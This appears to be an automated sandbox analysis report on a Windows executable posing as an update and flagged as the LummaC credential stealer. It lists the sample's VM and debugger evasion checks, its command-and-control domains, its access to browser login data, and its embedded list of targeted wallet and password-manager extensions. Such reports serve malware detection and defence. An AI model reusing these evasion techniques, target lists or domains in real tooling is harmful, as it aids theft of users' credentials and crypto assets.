Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00419FC0	0_2_00419FC0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004237C9	0_2_004237C9
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00402F90	0_2_00402F90
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00423FA0	0_2_00423FA0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004167AE	0_2_004167AE
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00437FB0	0_2_00437FB0

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: String function: 00893170 appears 175 times
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: String function: 004149E0 appears 77 times
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: String function: 00408050 appears 41 times
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: String function: 00889080 appears 69 times
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: String function: 00889040 appears 57 times

Source: NewI Upd v1.1.0.exe, 00000000.00000000.1662038750.00000000008C3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRmCfer.exe@ vs NewI Upd v1.1.0.exe
Source: NewI Upd v1.1.0.exe, 00000000.00000003.2986275551.00000000046EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRmCfer.exe@ vs NewI Upd v1.1.0.exe
Source: NewI Upd v1.1.0.exe	Binary or memory string: OriginalFilenameRmCfer.exe@ vs NewI Upd v1.1.0.exe

Source: NewI Upd v1.1.0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Code function: 0_2_004388C0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_004388C0

Source: NewI Upd v1.1.0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: NewI Upd v1.1.0.exe, 00000000.00000003.3035156183.00000000088C9000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035555761.0000000008895000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: NewI Upd v1.1.0.exe	ReversingLabs: Detection: 42%
Source: NewI Upd v1.1.0.exe	Virustotal: Detection: 34%

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

File read: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Jump to behavior

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: NewI Upd v1.1.0.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: NewI Upd v1.1.0.exe

Static file information: File size 2757632 > 1048576

Source: NewI Upd v1.1.0.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x27d200

Source: NewI Upd v1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: NewI Upd v1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: NewI Upd v1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: NewI Upd v1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: NewI Upd v1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: NewI Upd v1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: NewI Upd v1.1.0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: NewI Upd v1.1.0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Admin\Workspace\465053702\Project\Release\Project.pdb source: NewI Upd v1.1.0.exe

Source: NewI Upd v1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: NewI Upd v1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: NewI Upd v1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: NewI Upd v1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: NewI Upd v1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: NewI Upd v1.1.0.exe

Static PE information: section name: .fptable

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043E970 push eax; mov dword ptr [esp], CCCFCE81h		0_2_0043E971
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043BEB0 push eax; mov dword ptr [esp], 74757677h		0_2_0043BEBE

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe TID: 4432	Thread sleep time: -90000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe TID: 4432	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Code function: 0_2_00896350 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,

0_2_00896350

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Code function: 0_2_00886940 GetSystemInfo,

0_2_00886940

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Comms	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\CEF	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\PeerDistRepub	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior

Source: NewI Upd v1.1.0.exe, 00000000.00000003.3178938792.0000000001911000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmNetwo
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018DC000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018DC000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000190E000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178938792.0000000001911000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Code function: 0_2_0043D440 LdrInitializeThunk,

0_2_0043D440

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Code function: 0_2_0087D950 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0087D950

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_008C08B8 mov eax, dword ptr fs:[00000030h]		0_2_008C08B8
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_008BFC78 mov eax, dword ptr fs:[00000030h]		0_2_008BFC78

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Code function: 0_2_0089B300 GetProcessHeap,

0_2_0089B300

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0087D020 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0087D020
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0087D950 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0087D950
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0087DB70 SetUnhandledExceptionFilter,	0_2_0087DB70
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00888EB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00888EB0

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: bashfulacid.lat
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: tentabatte.lat
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: curverpluch.lat
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: talkynicer.lat
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: shapestickyr.lat
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: manyrestro.lat
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: slipperyloo.lat
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: wordyfindy.lat
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: begguinnerz.biz

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Code function: 0_2_00437FB0 cpuid

0_2_00437FB0

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Code function: 0_2_0087D720 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0087D720

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179859088.000000000196E000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000196E000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3157470323.000000000196B000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178798124.000000000196E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: NewI Upd v1.1.0.exe PID: 6648, type: MEMORYSTR
Source: Yara match	File source: 0.2.NewI Upd v1.1.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3179555778.00000000017B0000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179859088.000000000196E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: {"v":4,"se":false,"ad":false,"vm":false,"ex":[{"en":"ejbalbakoplchlghecdalmeeeajnimhm","ez":"MetaMask"},{"en":"aeblfdkhhhdcdjpifhhbdiojplfjncoa","ez":"1Password"},{"en":"jnlgamecbpmbajjfhmmmlhejkemejdma","ez":"Braavos"},{"en":"dlcobpjiigpikoobohmabehhmhfoodbb","ez":"Agrent X"},{"en":"jgaaimajipbpdogpdglhaphldakikgef","ez":"Coinhub"},{"en":"fcfcfllfndlomdhbehjjcoimbgofdncg","ez":"Leap Wallet"},{"en":"lgmpcpglpngdoalbgeoldeajfclnhafa","ez":"Safepal"},{"en":"hdokiejnpimakedhajhdlcegeplioahd","ez":"LastPass"},{"en":"kjmoohlgokccodicjjfebfomlbljgfhk","ez":"Ronin Wallet"},{"en":"pioclpoplcdbaefihamjohnefbikjilc","ez":"Evernote"},{"en":"dngmlblcodfobpdpecaadgfbcggfjfnm","ez":"MultiversX Wallet"},{"en":"kppfdiipphfccemcignhifpjkapfbihd","ez":"ForniterWallet"},{"en":"mmmjbcfofconkannjonfmjjajpllddbg","ez":"Fluvi Wallet"},{"en":"loinekcabhlmhjjbocijdoimmejangoa","ez":"Glass Wallet"},{"en":"heefohaffomkkkphnlpohglngmbcclhi","ez":"Morphis Wallet"},{"en":"idnnbdplmphpflfnlkomgpfbpcgelopg","ez":"XVerse Wallet"},{"en":"anokgmphncpekkhclmingpimjmcooifb","ez":"Compas Wallet"},{"en":"cnncmdhjacpkmjmkcafchppbnpnhdmon","ez":"Havah Wallet"},{"en":"ocjdpmoallmgmjbbogfiiaofphbjgchh","ez":"Sui Wallet"},{"en":"ojggmchlghnjlapmfbnjholfjkiidbch","ez":"Venom Wallet"},{"en":"nkbihfbeogaeaoehlefnkodbefgpgknn","ez":"MetaMask"},{"en":"egjidjbpglichdcondbcbdnbeeppgdph","ez":"Trust Wallet"},{"en":"ibnejdfjmmkpcnlpebklmnkoeoihofec","ez":"TronLink"},{"en":"fnjhmkhhmkbjkkabndcnnogagogbneec","ez":"Ronin Wallet"},{"en":"mcohilncbfahbmgdjkbpemcciiolgcge","ez":"OKX"},{"en":"fhbohimaelbohpjbbldcngcnapndodjp","ez":"Binance Chain Wallet"},{"en":"ffnbelfdoeiohenkjibnmadjiehjhajb","ez":"Yoroi"},{"en":"jbdaocneiiinmjbjlgalhcelgbejmnid","ez":"Nifty"},{"en":"afbcbjpbpfadlkmhmclhkeeodmamcflc","ez":"Math"},{"en":"hnfanknocfeofbddgcijnmhnfnkdnaad","ez":"Coinbase","ldb":true},{"en":"hpglfhgfnhbgpjdenjgmdgoeiappafln","ez":"Guarda"},{"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"en":"kncchdigobghenbbaddojjnnaogfppfj","ez":"iWlt"},{"en":"kkpllkodjeloidieedojogacfhpaihoh","ez":"EnKrypt"},{"en":"amkmjjmmflddogmhpjloimipbofnfjih","ez":"Wombat"},{"en":"nlbmnnijcnlegkjjpcfjclmcfggfefdm","ez":"MEW CX"},{"en":"nanjmdknhkinifnkgdcggcfnhdaammmj","ez":"Guild"},{"en":"nkddgncdjgjfcddamfgcmfnlhccnimig","ez":"Saturn"},{"en":"cphhlgmgameodnhkjdmkpanlelnlohao","ez":"NeoLine"},{"en":"nhnkbkgjikgcigadomkphalanndcapjk","ez":"Clover"},{"en":"acmacodkjbdgmoleebolmdjonilkdbch","ez":"Rabby"},{"en":"phkbamefinggmakgklpkljjmgibohnba","ez":"Pontem"},{"en":"efbglgofoippbgcjepnhiblaibcnclgk","ez":"Martian"},{"en":"nngceckbapebfimnlniiiahkandclblb","ez":"Bitwarden"},{"en":"lpfcbjknijpeeillifnkikgncikgfhdo","ez":"Nami"},{"en":"ejjladinnckdgjemekebdpeokbikhfci","ez":"Petra"},{"en":"opcgpfmipidbgpenhmajoajpbobppdil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfo
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179859088.000000000196E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: {"v":4,"se":false,"ad":false,"vm":false,"ex":[{"en":"ejbalbakoplchlghecdalmeeeajnimhm","ez":"MetaMask"},{"en":"aeblfdkhhhdcdjpifhhbdiojplfjncoa","ez":"1Password"},{"en":"jnlgamecbpmbajjfhmmmlhejkemejdma","ez":"Braavos"},{"en":"dlcobpjiigpikoobohmabehhmhfoodbb","ez":"Agrent X"},{"en":"jgaaimajipbpdogpdglhaphldakikgef","ez":"Coinhub"},{"en":"fcfcfllfndlomdhbehjjcoimbgofdncg","ez":"Leap Wallet"},{"en":"lgmpcpglpngdoalbgeoldeajfclnhafa","ez":"Safepal"},{"en":"hdokiejnpimakedhajhdlcegeplioahd","ez":"LastPass"},{"en":"kjmoohlgokccodicjjfebfomlbljgfhk","ez":"Ronin Wallet"},{"en":"pioclpoplcdbaefihamjohnefbikjilc","ez":"Evernote"},{"en":"dngmlblcodfobpdpecaadgfbcggfjfnm","ez":"MultiversX Wallet"},{"en":"kppfdiipphfccemcignhifpjkapfbihd","ez":"ForniterWallet"},{"en":"mmmjbcfofconkannjonfmjjajpllddbg","ez":"Fluvi Wallet"},{"en":"loinekcabhlmhjjbocijdoimmejangoa","ez":"Glass Wallet"},{"en":"heefohaffomkkkphnlpohglngmbcclhi","ez":"Morphis Wallet"},{"en":"idnnbdplmphpflfnlkomgpfbpcgelopg","ez":"XVerse Wallet"},{"en":"anokgmphncpekkhclmingpimjmcooifb","ez":"Compas Wallet"},{"en":"cnncmdhjacpkmjmkcafchppbnpnhdmon","ez":"Havah Wallet"},{"en":"ocjdpmoallmgmjbbogfiiaofphbjgchh","ez":"Sui Wallet"},{"en":"ojggmchlghnjlapmfbnjholfjkiidbch","ez":"Venom Wallet"},{"en":"nkbihfbeogaeaoehlefnkodbefgpgknn","ez":"MetaMask"},{"en":"egjidjbpglichdcondbcbdnbeeppgdph","ez":"Trust Wallet"},{"en":"ibnejdfjmmkpcnlpebklmnkoeoihofec","ez":"TronLink"},{"en":"fnjhmkhhmkbjkkabndcnnogagogbneec","ez":"Ronin Wallet"},{"en":"mcohilncbfahbmgdjkbpemcciiolgcge","ez":"OKX"},{"en":"fhbohimaelbohpjbbldcngcnapndodjp","ez":"Binance Chain Wallet"},{"en":"ffnbelfdoeiohenkjibnmadjiehjhajb","ez":"Yoroi"},{"en":"jbdaocneiiinmjbjlgalhcelgbejmnid","ez":"Nifty"},{"en":"afbcbjpbpfadlkmhmclhkeeodmamcflc","ez":"Math"},{"en":"hnfanknocfeofbddgcijnmhnfnkdnaad","ez":"Coinbase","ldb":true},{"en":"hpglfhgfnhbgpjdenjgmdgoeiappafln","ez":"Guarda"},{"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"en":"kncchdigobghenbbaddojjnnaogfppfj","ez":"iWlt"},{"en":"kkpllkodjeloidieedojogacfhpaihoh","ez":"EnKrypt"},{"en":"amkmjjmmflddogmhpjloimipbofnfjih","ez":"Wombat"},{"en":"nlbmnnijcnlegkjjpcfjclmcfggfefdm","ez":"MEW CX"},{"en":"nanjmdknhkinifnkgdcggcfnhdaammmj","ez":"Guild"},{"en":"nkddgncdjgjfcddamfgcmfnlhccnimig","ez":"Saturn"},{"en":"cphhlgmgameodnhkjdmkpanlelnlohao","ez":"NeoLine"},{"en":"nhnkbkgjikgcigadomkphalanndcapjk","ez":"Clover"},{"en":"acmacodkjbdgmoleebolmdjonilkdbch","ez":"Rabby"},{"en":"phkbamefinggmakgklpkljjmgibohnba","ez":"Pontem"},{"en":"efbglgofoippbgcjepnhiblaibcnclgk","ez":"Martian"},{"en":"nngceckbapebfimnlniiiahkandclblb","ez":"Bitwarden"},{"en":"lpfcbjknijpeeillifnkikgncikgfhdo","ez":"Nami"},{"en":"ejjladinnckdgjemekebdpeokbikhfci","ez":"Petra"},{"en":"opcgpfmipidbgpenhmajoajpbobppdil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfo
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3109623142.000000000196B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3109663115.0000000001973000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
